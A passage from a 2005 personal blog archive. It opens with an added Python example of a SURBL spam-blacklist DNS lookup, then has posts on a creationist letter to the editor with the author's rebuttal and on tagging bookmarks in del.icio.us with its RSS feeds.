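Here is the lookup the post walks through, as an added example that is not part of the original post: it builds the query name (reversing the octets of an IP literal), resolves it through a pluggable resolver, and distinguishes “listed”, “not listed”, and an unexpected answer outside 127.0.0.0/8. The names surbl_query_name, host_from_link, resolve_a, surbl_check and fake_resolve are my own, and the stand-in DNS table is constructed so the code runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

SURBL_ZONE = "multi.surbl.org"
LOOPBACK = ipaddress.IPv4Network("127.0.0.0/8")

def surbl_query_name(host: str, zone: str = SURBL_ZONE) -> str:
    """Hostname: prefixed to the zone as-is. IPv4 literal: octets reversed first."""
    host = host.strip().rstrip(".").lower()
    try:
        octets = ipaddress.IPv4Address(host).exploded.split(".")
    except ipaddress.AddressValueError:
        return f"{host}.{zone}"
    return ".".join(reversed(octets)) + f".{zone}"

def host_from_link(url: str) -> str:
    """Host part of a link found in an email (scheme may be missing)."""
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url).hostname or ""

def resolve_a(name: str) -> list:
    """Live lookup (hypothetical helper): A records for name, [] on NXDOMAIN."""
    try:
        infos = socket.getaddrinfo(name, None, socket.AF_INET)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})

def surbl_check(link: str, resolve=resolve_a):
    """True = listed (answer in 127.0.0.0/8; multi.surbl.org encodes the
    matching lists in the last octet), False = NXDOMAIN (not listed),
    None = unexpected answer (e.g. a resolver that rewrites NXDOMAIN into
    an ad page): treat None as 'unknown', never as 'clean'."""
    answers = resolve(surbl_query_name(host_from_link(link)))
    if not answers:
        return False
    if all(ipaddress.IPv4Address(a) in LOOPBACK for a in answers):
        return True
    return None

# Constructed stand-in for DNS so the example runs offline; the listed
# entry mirrors the answer shown in the post.
FAKE_DNS = {"80.248.127.210.multi.surbl.org": ["127.0.0.12"]}

def fake_resolve(name: str) -> list:
    return FAKE_DNS.get(name, [])
```

Passing resolve_a instead of fake_resolve performs the real query against multi.surbl.org.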

When I first began reading about the mechanism surbl.org provides, I thought it seemed awfully clunky and sort of jury-rigged. And in a way, it is. But it’s also ingenious in its piggybacking on top of DNS, and as scalability is one of my hot issues right now, I found this very interesting.

What About Children Without Hands?

February 18th, 2005 by daryl

I’m pretty sensitive to the fact that some of my beliefs brush up rather harshly against some of the beliefs of a few people who probably read me from time to time, and so I’m reluctant at times to post on certain topics. Or, really, one topic: Religion. It’s not that I’m in any way ashamed of my beliefs; I just don’t want to hurt the feelings of anybody close to me whose feelings would be hurt by some of my opinions. This post could possibly hurt feelings. Fair warning.

The following letter to the editor appeared in an area newspaper (one that I actually used to be a copy editor and layout guy for):

It is beyond my understanding that anyone with just the slightest intelligence could believe that there is no creator of all things. I would think that such a person would be too embarrassed to reveal such stupidity.

Let’s look at a few things. The person who invented the camera for example, truly did a marvelous job. A mechanism that with its lenses and shutter could capture a picture of an object. Man is praised for his ability to create such a marvelous thing. All the work involved to figure it out and build it. But with the human eye, well it just happened.

I was in Townsend a while back and saw some paintings from one of the local artists. The details in the picture would captivate anyone. It took lots of thought and imagination to paint such a fine picture. Did it just happen or did someone design it?

Computers are a very great invention. The human brain has devised a wonderful electronic one. But the human brain? Well it just happened.

Even in nature it is so amazing with all its diversity and complexity. How is it a hummingbird does what he does? It is so much different from other birds. All the birds are different from each other. You would think somewhere along the line since they just happened that some birds would be a little mixed up. How is it possible that a little acorn becomes a mighty oak? All the branches, twigs, leaves all came from the DNA that was in the little acorn seed. All the different varieties of trees just happened? All grasses, weeds which differ so much, they were never designed, they all just happened. What ignorance! Let’s think for a moment of the little insignificant watermelon seed. It goes into the ground, dies, and out from it is a huge vine and the vine produces a watermelon which has a green cover, a white rind and a red inside full of water for man’s enjoyment. Same with corn and all seeds.

Have you ever wondered why it is that all the fruits and vegetables are just the right size for humans to eat? An apple or carrot can be so easily held in the hand. Why aren’t there a few potatoes or oranges as big as houses? All the things we eat are just right in size for our consumption. Just happened huh?

All you folks who say there is no creator who made all these things are showing off absolute stupidity. Your problem is that you don’t want to have to answer to your maker so are free to do whatever you like.

Kinda reminds me of the fellow who went to his medicine cabinet and picked out a product that read, “Poison.” But he didn’t believe it would kill him so he drank it and he died. It doesn’t matter whether or not you believe something. What matters is that truth is truth and regardless of what you believe, truth will stand. You who don’t believe in a creator with whom you must give an answer to one day. That doesn’t change the truth. Not only will you answer to him but every knee shall bow and every tongue confess that Jesus Christ is Lord to the glory of God the Father.

“The fool has said in his heart, there is no God.”

Aside from the fact that the writer’s letter isn’t very Christian in its approach to those he’s criticizing (he must not have read Matthew 5:22, which says that anybody calling somebody a fool is in danger of hellfire), he’s simply got his facts wrong. Nobody on my side of the fence suggests that the human brain “just happened.” In fact, it took years and years of minor random changes, and natural selection for the useful changes, for the human brain to evolve to its current pretty darned nifty state. In my opinion, this is much more complexly beautiful than the notion that the human brain was created with a zap and an incantation by any god. But that’s just one flaw with his argument. This letter really struck a nerve with me, and so I drafted my own and sent it off to the editor of the paper that published this gentleman’s tirade. The text of mine follows:

In a letter entitled “Believing is choice” published on Feb. 18, the writer expresses his astonishment that anyone could believe that all the wonderful things of this earth could have come about without the work of a divine hand. His argument seems to be that great things cannot happen spontaneously; there must be a designer, and (by extension) the greater and more complex the item in question, the greater its support for the existence of a creator must be. The obvious question, then, is how great a being must exist to have created so great a god. And how great a being to have created that god. And so on. The argument simply doesn’t hold together when you remove the convenient assumption that God Himself has no creator, which assumption undermines the foundation of the whole argument, rendering it not only unsound but utterly absurd.

The writer notes as further proof of a grand design that fruits and vegetables are the perfect size for human beings to hold in their hands and eat. But what about watermelons, which are too large for my mouth? What about coconuts, which are rough on the teeth? Why, if the divine plan is so well-thought-out, do edible animals flee when we hunt them rather than falling onto our plates fully cooked and seasoned upon the first hint of our hunger? I once tried to eat a sperm whale in one bite and was unable to manage it in spite of God’s perfect design. Why do our joints wear out and why are we so susceptible to the illnesses inflicted upon us by tiny microbes? Why do our teeth have to fall out and regrow when we’re young rather than growing with us like the rest of our bodies? Why do we need glasses and hearing aids? Why is it possible for us to swim but not to fly? Why are babies born with holes in their hearts and with twins attached to them at the head and missing the hands God designed carrots and oranges to be held so easily in? Are these children God’s rough drafts? Is God not so perfect after all?

A more plausible answer seems to me to be that they’re not the rough drafts of some halfwit god but are products of an unfeeling mechanistic natural process. Anyone who would worship the careless and haphazard (or just plain cruel) god represented by the facts the letter-writer leaves out quite possibly deserves whatever that god decides tomorrow to inflict upon him.

Delicious and Extispicious

February 17th, 2005 by daryl

If you haven’t heard of del.icio.us, chances are that you’re not missing much. It’s a bookmark management tool that appeared late last year and that promotes community or collaborative bookmarking, with the bookmarks stored remotely. Further, it’s a bit of a shift in the approach to bookmarking: Rather than putting a link in a folder as we’re all used to doing, you apply tags to links, and you can apply as many tags as you want to. This makes for one-to-many categorization without the redundancy of bookmarking something many times, one instance per bookmark category. It also implicitly allows for tiered organization. For example, I’ve spent most of the day googling around for information about two major open source database management systems, postgresql and mysql. I’m trying to collect a whole bunch of data about both servers so that I can make a decision about which to use for a big project I’m working on. Because I got really tired of the bookmark interface and the pain it becomes to categorize things, I started tossing my links into my del.icio.us profile. All results I tagged “database.” Postgresql-specific links I also tagged “postgresql,” and mysql-specific links I additionally tagged “mysql.” Sites relevant to both databases (such as feature-comparison sites) I applied all three tags to.

So far, this probably seems very little different from regular old bookmarking except that the interface has changed. The beauty of it all comes together, though, when you consider the handy fact that you can get at your links via RSS, which can be read in a news reader, displayed as bookmarks in Firefox, parsed in a MediaWiki plugin for display in an article, and so on. By using del.icio.us to store and tag my bookmarks, I’m actually making them very portable. Del.icio.us’s RSS API is very simple and elegant in that it allows you by simply using a correctly-formatted URL to get only the subset of links you want to see. Here are some examples:

  • http://del.icio.us/rss/tag/database shows me an RSS feed of all links across the system tagged “database”
  • http://del.icio.us/rss/daryl/database shows me an RSS feed of just my links tagged “database”
  • http://del.icio.us/rss/daryl shows me an RSS feed of all of my links
  • http://del.icio.us/daryl/database shows me an HTML page of all my links tagged “database”
  • http://del.icio.us/daryl/postgresql shows me an HTML page of all my links tagged “postgresql”
  • http://del.icio.us/daryl shows me an HTML page of all my links

So del.icio.us provides not only an online interface for managing and viewing your bookmarks, but also an alternate format for the links that allows you to plug them into pretty much any RSS-enabled system you want to. This is very cool.

But, as I said at the beginning, if you’re not familiar with del.icio.us, you’re probably not missing much. Chances are that you’re bookmarking things and getting along just fine, and the minor shift in mechanism and presentation seems trivial. Even I felt this way until just today. I thought del.icio.us was sort of a pain to use and didn’t want to have to log in to a site to get my bookmarks. But as I started combing through sites about postgresql and mysql and bookmarking them, I found the interface for categorizing the bookmarks to be cumbersome and irritating, and I began to think that I’d probably never even bother to go digging through the bookmarks to find the links. Or I’d have to double-bookmark things to categorize them into multiple applicable folders, and it’d all become very hairy to manage and use. So I tried using del.icio.us, and when you add the popup to your link bar in Firefox, it’s really much simpler to use than the bookmark interface. And when you happen to be a developer who can tweak posts in your MediaWiki extranet to consume RSS feeds and use them to display links, del.icio.us starts to look much more attractive. I’m a convert.

Extisp.icio.us is a nifty visual representation of your del.icio.us tags that changes the font size for tag listings to show which are your most oft-used tags. It has no real practical use, but it can be fun to compare your tags to those of friends and hardcore del.icio.us users (see for example the difference between a couple of my colleagues, one of whom is a reluctant user like me and one of whom is verging on being psychotic about tagging his links). You can see my tags here. Not surprisingly, postgresql and database are the most prominent tags, with mysql coming in third place.